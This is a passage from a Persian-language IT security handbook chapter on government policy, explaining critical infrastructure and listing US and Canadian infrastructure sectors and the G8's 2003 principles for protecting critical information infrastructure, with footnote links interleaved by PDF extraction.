ﺟﻬﺎﻧﻲ ﺩﺍﺭﺩ .ﻫﻤﻴﺸﻪ ﺑﺎﻳﺪ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷـﺖ ﻛـﻪ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﻭ
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﺮﺯﻫﺎﻱ ﻛﺸﻮﺭﻫﺎ ﻧﻴﺴﺘﻨﺪ.
ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ
ﺩﺭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛﻨﺸﻲ ﺩﻭﻟـﺖ ﺑـﻪ ﻣـﺸﻜﻼﺕ
ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧـﻪ ﻫـﺎ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ١١ﻧـﺎﻡ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ.
ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ ،ﺷــﺒﻜﻪﺍﻱ ﺍﺯ ﺳــﺮﻣﺎﻳﻪﻫــﺎﻱ ﻓﻴﺰﻳﻜــﻲ ﻭ
ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺭ ﺍﻗﺘـﺼﺎﺩ ﻳـﺎ ﺭﻓـﺎﻩ ﻳـﻚ
ﻛﺸﻮﺭ ﺩﺍﺭﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺷﺒﻜﺔ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ
ﺣﻴﺎﺗﻲ ﺍﺳﺖ ﻛـﻪ ﺷـﺎﻣﻞ ﺗﻤـﺎﻣﻲ ﺑﺎﻧﻜﻬـﺎﻱ ﺧـﺼﻮﺻﻲ ،ﺑﺎﻧـﻚ
ﻣﺮﻛﺰﻱ ،ﺑﺎﺯﺍﺭﻫﺎﻱ ﻣﺒﺎﺩﻻﺕ ﻛﺎﻻ ،ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺗﺒـﺎﺩﻝ ﭼـﻚ ،ﻭ
ﺩﻳﮕﺮ ﻧﻬﺎﺩﻫﺎﻳﻲ ﻛﻪ ﺩﺭﮔﻴـﺮ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻭ ﺍﻋﺘﺒـﺎﺭﻱ ﻫـﺴﺘﻨﺪ
ﻣﻲﺷﻮﺩ .ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﺗﻤﺎﻣﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺟﻬـﺎﻥ ﺍﻳـﻦ ﻋﻤﻠﻴـﺎﺕ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴـﺮﺩ .ﺷـﺒﻜﺔ ﺣﻤـﻞ ﻭ ﻧﻘـﻞ ﻧﻴـﺰ
ﺯﻳﺮﺳﺎﺧﺖ ﺣﻴﺎﺗﻲ ﺩﻳﮕﺮﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺟـﺎﺩﻩﻫـﺎ ،ﭘﻠﻬـﺎ ،ﻛﺎﻧﺎﻟﻬـﺎ،
ﺧﻄﻮﻁ ﺭﺍﻩﺁﻫﻦ ﻭ ﻓﺮﻭﺩﮔﺎﻫﻬﺎ ﺗـﺸﻜﻴﻞ ﺷـﺪﻩ ﺍﺳـﺖ .ﺯﻳﺮﺳـﺎﺧﺖ
ﺣﻤﻞ ﻭ ﻧﻘﻞ ﻏﺎﻟﺒـﹰﺎ ﻓﻴﺰﻳﻜـﻲ ﻭ ﻣﻜـﺎﻧﻴﻜﻲ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﻋﻤﻠﻜـﺮﺩ
ﺻﺤﻴﺢ ﭼﺮﺍﻏﻬﺎﻱ ﺭﺍﻫﻨﻤﺎﻳﻲ ،ﺑﺎﺯ ﻭ ﺑﺴﺘﻪ ﻛﺮﺩﻥ ﭘﻠﻬﺎ ،ﺭﺍﻩﺍﻧﺪﺍﺧﺘﻦ
ﻗﻄﺎﺭﻫﺎ ﻭ ﻛﻨﺘﺮﻝ ﺗﺮﺍﻓﻴـﻚ ﻫـﻮﺍﻳﻲ ﻫﻤـﻪ ﻭ ﻫﻤـﻪ ﺑـﻪ ﻋﻤﻠﻜـﺮﺩ
ﺻﺤﻴﺢ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﻧﺪ.
ﻫﻴﭻ ﺗﻌﺮﻳﻒ ﻣﺸﺨﺼﻲ ﺑﺮﺍﻱ ﮔﺮﻭﻫﻬـﺎﻱ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ
ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ ﻭ ﻓﻬﺮﺳــﺖ ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ ﻛــﻪ ﺗﻮﺳــﻂ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ ﺍﺯ ﻛـﺸﻮﺭﻱ ﺑـﻪ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ ﻭ ﺍﺯ
E-Security
Critical Infrastructures
10
11
٢٣٣
ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺯﻣﺎﻧﻲ ﺗﺎ ﺯﻣﺎﻥ ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﺍﺳـﺖ .ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ
ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﺓ ﺁﻣﺮﻳﻜﺎ ﻛﻪ ﺩﺭ ﻓﻮﺭﻳﻪ ﺳﺎﻝ ۲۰۰۳ﺑﻪ ﭼـﺎﭖ
ﺭﺳــﻴﺪ ۱۳ ،ﮔــﺮﻭﻩ ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ ﺭﺍ ﻣــﺸﺨﺺ ﻣــﻲﺳــﺎﺯﺩ:
(۱ﻛﺸـــﺎﻭﺭﺯﻱ (۲ ،ﺗﻐـــﺬﻳﻪ (۳ ،ﺁﺏ (۴ ،ﺑﻬﺪﺍﺷـﺖ ﻋﻤـﻮﻣﻲ،
(۵ﺧـــﺪﻣﺎﺕ ﺍﺿـــﻄﺮﺍﺭﻱ (۶ ،ﺩﻭﻟـــﺖ (۷ ،ﺻـــﻨﺎﻳﻊ ﺩﻓـــﺎﻋﻲ،
(۸ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍﻩ ﺩﻭﺭ (۹ ،ﺍﻧﺮﮊﻱ (۱۰ ،ﺣﻤﻞ ﻭ ﻧﻘـﻞ،
(۱۱ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﺍﻣﻮﺭ ﻣﺎﻟﻲ (۱۲ ،ﻣـﻮﺍﺩ ﺷـﻴﻤﻴﺎﻳﻲ ﻭ ﭘﺮﺧﻄـﺮ ،ﻭ
(۱۳ﺧﺪﻣﺎﺕ ﭘﺴﺘﻲ ﻭ ﻛﺸﺘﻴﺮﺍﻧﻲ ١٢.ﺩﺭ ﻣﻘﺎﻳـﺴﻪ ﺑـﺎ ﻣـﻮﺍﺭﺩ ﺫﻛـﺮ
ﺷﺪﻩ ،ﺍﺳﺘﺮﺍﺗﮋﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﺎﻧـﺎﺩﺍ ﺗﻨﻬـﺎ ﺍﺯ
ﺷﺶ ﮔﺮﻭﻩ ﻧﺎﻡ ﻣﻲﺑﺮﺩ (۱ :ﺍﺭﺗﺒﺎﻃـﺎﺕ (۲ ،ﺩﻭﻟـﺖ (۳ ،ﺍﻧـﺮﮊﻱ ﻭ
ﺻﻨﺎﻳﻊ ﻫﻤﮕﺎﻧﻲ (۴ ،ﺧﺪﻣﺎﺕ )ﻛـﻪ ﺩﺭ ﻛﺎﻧـﺎﺩﺍ ﺷـﺎﻣﻞ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ،
١٣
ﺗﻮﺯﻳﻊ ﻏﺬﺍ ،ﻭ ﺑﻬﺪﺍﺷـﺖ ﺍﺳـﺖ( (۵ ،ﺍﻣﻨﻴـﺖ ،ﻭ (۶ﺣﻤـﻞ ﻭ ﻧﻘـﻞ.
ﺗﻌﺮﻳﻒ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ ،ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﺩﺭﻙ
١٤
ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ،ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﻧﻴﺴﺖ.
The National Strategy to Secure Cyberspace
][U.S.
http://www.whitehouse.gov/pcipb
http://www.dhs.gov/interweb/assetlibrary/Natio
nal_Cyberspace_Strategy.pdf
& Office of Critical Infrastructure Protection
]Emergency Prepareness [Canada
http://www.ocipep.gc.ca/home/index_e.asp
۱۴
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﭘﻴﺸﻘﺪﻡ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ
ﻛﻪ ﺩﺭ ﻣﻘﻴﺎﺱ ﺑﺰﺭﮔﺘﺮﻱ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻫﻤﻜـﺎﺭﻱ ﻣـﻲﻛﻨﻨـﺪ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﮔﺮﻭﻩ G8ﺩﺭ ﻣﺎﻩ ﻣـﻲ ﺳـﺎﻝ ۱۱ ، ۲۰۰۳ﺍﺻـﻞ ﺭﺍ
ﻣﺸﺨﺺ ﻛﺮﺩ ﻛﻪ ﺑـﺮﺍﻱ ﺗﻮﺳـﻌﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺓ
ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ١٦.ﺍﻳﻦ ﺍﺻـﻮﻝ
ﺑﻪ ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ:
.۱
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺩﺍﺭﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻫﺸﺪﺍﺭ ﺩﻫﻨﺪﺓ ﺍﺿـﻄﺮﺍﺭﻱ
ﺑﺮﺍﻱ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﺣﻮﺍﺩﺙ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺎﺷﻨﺪ.
.۲
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺳﻄﺢ ﺁﮔﺎﻫﻲ ﻭ ﺩﺍﻧﺶ ﺧﻮﺩ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ ﺗـﺎ
ﺑﻪ ﺩﺭﻙ ﺍﻓﺮﺍﺩ ﺍﺯ ﻣﺎﻫﻴﺖ ﻭ ﻭﺳﻌﺖ ﺯﻳﺮﺳـﺎﺧﺖ ﺍﻃﻼﻋـﺎﺕ
ﺣﺴﺎﺱ ﺧﻮﺩ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ ﻭ ﻧﻘـﺶ ﺁﻧﻬـﺎ ﺭﺍ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺗﻌﺮﻳﻒ ﻛﻨﻨﺪ.
.۳
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﻣـﻮﺭﺩ ﻣﻄﺎﻟﻌـﻪ ﻗـﺮﺍﺭ
ﺩﻫﻨﺪ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺘﻘﺎﺑﻞ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﻣﺸﺨﺺ ﺳـﺎﺯﻧﺪ ﻭ
ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ.
.۴
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﻣﺸﺎﺭﻛﺖ ﻣﻴـﺎﻥ ﺑﺨـﺶ ﻋﻤـﻮﻣﻲ ﻭ ﺑﺨـﺶ
ﺧﺼﻮﺻﻲ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩ ﻭ ﺍﻃﻼﻋﺎﺕ ﺯﻳﺮﺳـﺎﺧﺘﻲ ﻣﻬـﻢ
ﺧــﻮﺩ ﺭﺍ ﻣــﻮﺭﺩ ﺗﺠﺰﻳــﻪ ﻭ ﺗﺤﻠﻴــﻞ ﻗــﺮﺍﺭ ﺩﻫﻨــﺪ ﻭ ﺁﻧﻬــﺎ ﺭﺍ
ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺁﺳﻴﺐﺩﻳﺪﻥ ﺁﻧﻬـﺎ ﺗـﺎ ﺣـﺪ
ﺍﻣﻜﺎﻥ ﺟﻠـﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻨـﺪ ﻭ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﺳـﻴﺒﻬﺎﻱ ﻭﺍﺭﺩﻩ
ﻭﺍﻛﻨﺶ ﻧﺸﺎﻥ ﺩﻫﻨﺪ.
.۵
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺨﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺯﻣﺎﻥ
ﺑﺤﺮﺍﻥ ﺍﻳﺠﺎﺩ ﻭ ﺍﺯ ﺁﻥ ﻧﮕﻬـﺪﺍﺭﻱ ﻛﻨﻨـﺪ ،ﻭ ﺁﻧﻬـﺎ ﺭﺍ ﻣـﻮﺭﺩ
12
13
ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺟﺰﺋﻴﺎﺕ ﻭﺍﻛﻨﺸﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑـﻪ ﻣـﺴﺌﻠﻪ
ﺣﻔﺎﻇـــﺖ ﺍﺯ ﺯﻳﺮﺳـــﺎﺧﺘﻬﺎﻱ ﺍﺳﺎﺳـــﻲ ﻣـــﻲﺗﻮﺍﻧﻴـــﺪ ﺑـــﻪ ﻛﺘـــﺎﺏ
International Critical Information Infrastructure
Protection Handbookﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ .ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ ﻣﺮﻛـﺰ
ﻣﻄﺎﻟﻌﺎﺕ ﺍﻣﻨﻴﺖ ﻭ ﺗﺤﻘﻴﻘﺎﺕ ﺗﺪﺍﺧﻞ ﻣﺆﺳﺴﻪ ﻓﻨﺎﻭﺭﻱ ﺩﻭﻟـﺖ ﺳـﻮﺋﻴﺲ
ﺑﻪ ﺍﻧﺠﺎﻡ ﺭﺳﻴﺪﻩ ﺍﺳﺖ:
http://www.isn.ethz.ch/crn
Best Practices
۱۶
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩﻫﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
http://www.cybersecuritycooperation.org/docu
ments/G8_CIIP_Principles.pdf
15
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑـﻪ ﺩﻻﻳـﻞ ﺯﻳـﺎﺩﻱ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ
ﺍﺳﺖ .ﺍﻭﻝ ،ﺑﻪ ﺭﻭﺷﻦ ﺷﺪﻥ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛـﻪ ﭼـﺮﺍ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻣﻬﻢ ﺍﺳﺖ .ﺍﮔﺮ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺩﺭﻙ ﻛﻨﻨـﺪ ﻛـﻪ
ﺩﺭﺻﻮﺭﺕ ﺧﺮﺍﺑﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﭘﻮﻝ ﺩﺭ ﺑﺎﻧﻜﻬـﺎ ﻏﻴـﺮ ﻗﺎﺑـﻞ ﭘﺮﺩﺍﺧـﺖ
ﻣﻲﺷﻮﺩ ،ﻗﻄﺎﺭﻫﺎ ﻗﺎﺩﺭ ﺑﻪ ﺗﺮﻙ ﺍﻳﺴﺘﮕﺎﻩ ﻧﻤﻲﺑﺎﺷـﻨﺪ ﻭ ﺣﺘـﻲ ﺁﺏ
ﺁﺷﺎﻣﻴﺪﻧﻲ ﭘﻤﭗ ﻧﺨﻮﺍﻫﺪ ﺷﺪ ،ﺁﻧﮕﺎﻩ ﺑﻬﺘﺮ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧـﺴﺖ ﺁﺛـﺎﺭ
ﻧﺎﺷــﻲ ﺍﺯ ﻣــﺸﻜﻼﺕ ﺍﻣﻨﻴﺘــﻲ ﺭﺍ ﺩﺭﻙ ﻛﻨﻨــﺪ .ﺩﻭﻡ ،ﮔﺮﻭﻫﻬــﺎﻱ
ﺯﻳﺮﺳــﺎﺧﺘﻲ ﺑــﻪ ﺍﻳــﻦ ﺩﻟﻴــﻞ ﺍﻫﻤﻴــﺖ ﺩﺍﺭﻧــﺪ ﻛــﻪ ﺑــﻪ ﺗﻌﺮﻳــﻒ
ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺟﻮﺍﻣﻊ ﻛﻤـﻚ ﻣـﻲ ﻛﻨﻨـﺪ ﻭ ﺟـﻮﺍﻣﻌﻲ ﺑـﺎ ﻋﻼﻳـﻖ
ﻣﺸﺘﺮﻙ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﻧﻴﺎﺯ ﺑﻪ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ
ﺩﺍﺭﻧﺪ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺻﻨﻌﺘﮕﺮﺍﻥ ﺻـﻨﻌﺖ ﺑـﺮﻕ ﻭ
ﻣﺴﺘﺸﺎﺭﺍﻥ ﺩﻭﻟﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺸﺎﺭﻛﺖ ﻳﻜﺪﻳﮕﺮ ﻧﻘـﺶ ﻣﺜﺒﺘـﻲ
ﺩﺭ ﺭﻓﻊ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺑﺮﻕ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ .ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺍﺯ ﺟﻤﻠـﻪ ﺷﻨﺎﺳـﺎﻳﻲ ﺍﻟﮕﻮﻫـﺎﻱ ﺳـﺮﺁﻣﺪﻱ ١٥ﻭ
ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺗﺎ ﺣﺪﻭﺩﻱ ﻣـﻲﺗﻮﺍﻧـﺪ
ﻲ ﻣﻮﺟﻮﺩ ﺑﻜﺎﺭ ﺭﻭﺩ.
ﺩﺭ ﻣﺤﺪﻭﺩﻩ ﻣﺆﺳﺴﺎﺕ ﻭ ﺧﻄﻮﻁ ﺗﻮﻟﻴﺪ ﺻﻨﻌﺘ ﹺ
ﺍﻳﻦ ﻣﺆﺳﺴﺎﺕ ﺩﺭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺷﺎﻣﻞ ﺍﺗﺤﺎﺩﻳﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ،
ﺷﺮﻛﺘﻬﺎﻱ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻭ ﺳـﺎﻳﺮ ﺷـﺮﻛﺘﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﺑـﺮ ﺻـﻨﺎﻳﻊ
ﻣﺨﺘﻠﻒ ﻣﻲ ﺑﺎﺷﻨﺪ .ﺍﻛﺜﺮ ﻛﺸﻮﺭﻫﺎ ﺩﺭ ﺑﺨﺶ ﺩﻭﻟﺘـﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪﻫـﺎ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻧﻈـﺎﺭﺗﻲ
ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ) .ﻣﺜﻞ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻄﻮﺭ ﺳـﻨﺘﻲ ﺑﺎﻧﻜـﺪﺍﺭﻱ ،ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﺍﻩ
ﺩﻭﺭ ﻭ ﺑﺨﺸﻬﺎﻱ ﺍﻧﺮﮊﻱ ﺭﺍ ﻗﺎﻧﻮﻧﻤﻨﺪ ﻛﺮﺩﻩﺍﻧﺪ(.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٣٤
ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ﺗﺎ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨـﺪ ﻛـﻪ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ
ﺍﺿــﻄﺮﺍﺭﻱ ﻫﻤﭽﻨــﺎﻥ ﺍﻣــﻦ ﻭ ﭘﺎﻳــﺪﺍﺭ ﺑــﺎﻗﻲ ﻣــﻲﻣﺎﻧﻨــﺪ ﻭ
ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
.۶
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻨﺪ ﻛﻪ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﺑﻮﺩﻥ ﺩﺍﺩﻩ ،١٧ﺍﻣﻨﻴﺖ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺱ ﺭﺍ
ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺩﻩﺍﻧﺪ.
.۷
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺭﺩﻳـﺎﺑﻲ ﺣﻤـﻼﺕ ﺑـﻪ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻣﻬـﻢ
ﺍﻃﻼﻋــﺎﺗﻲ ﺭﺍ ﺗــﺴﻬﻴﻞ ﺑﺨــﺸﻴﺪﻩ ﻭ ﺩﺭ ﺯﻣــﺎﻥ ﻣﻨﺎﺳــﺐ،
ﺍﻃﻼﻋﺎﺕ ﺍﻳﻦ ﺭﺩﻳﺎﺑﻲ ﺭﺍ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺘﻘﺎﺿـﻲ
ﻣﻨﺘﺸﺮ ﺳﺎﺯﻧﺪ.
.۸
ﻛــﺸﻮﺭﻫﺎ ﺑﺎﻳــﺪ ﺩﺭ ﺧــﺼﻮﺹ ﺍﻓــﺰﺍﻳﺶ ﻗﺎﺑﻠﻴــﺖ ﻭﺍﻛــﻨﺶ،
ﺁﻣﻮﺯﺷﻬﺎ ﻭ ﺗﻤﺮﻳﻨﺎﺗﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ
ﺑﺮﺍﻱ ﭘﻴﺸﺎﻣﺪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺩﺭ ﺯﻣﺎﻥ ﻭﻗـﻮﻉ ﺣﻤﻠـﻪ ﻣـﻮﺭﺩ
ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ ﻭ ﻫﻤﮕـﺎﻥ ﺭﺍ ﻧﻴـﺰ ﺗـﺸﻮﻳﻖ ﺑـﻪ ﺍﻧﺠـﺎﻡ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺸﺎﺑﻪ ﺳﺎﺯﻧﺪ.
.۹
ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻨﺪ ﻛﻪ ﺑـﺮﺍﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ
ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ،ﻗﻮﺍﻧﻴﻦ ﻣﻨﺎﺳﺐ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻗﺎﺑﻞ ﻗﺒـﻮﻝ
ﺩﺍﺭﻧﺪ ﻭ ﺍﻳﻦ ﺗﺤﻘﻴﻘﺎﺕ ﺭﺍ ﺑﺎ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﺑﻪ ﻧﺤﻮ ﺍﺣـﺴﻦ
ﻣﻄﺎﺑﻘــﺖ ﺩﻫﻨــﺪ -ﻣﺎﻧﻨــﺪ ﻗــﻮﺍﻧﻴﻨﻲ ﻛــﻪ ﺩﺭ ﻛﻨﻮﺍﻧــﺴﻴﻮﻥ
ﺗﺨﻠﻔﺎﺕ ﺳﺎﻳﺒﺮ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ١٨ﺩﺭ ﻧـﻮﺍﻣﺒﺮ ﺳـﺎﻝ ۲۰۰۱
ﺗﺼﻮﻳﺐ ﺷﺪ ﻭ ﭘﺮﺳﻨﻞ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻱ ﺭﺍ ﺁﻣﺎﺩﺓ ﺍﺭﺯﻳﺎﺑﻲ ﻭ
ﺭﺩﻳﺎﺑﻲ ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺑﻪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ
ﺣﺴﺎﺱ ﻧﻤﻮﺩ.
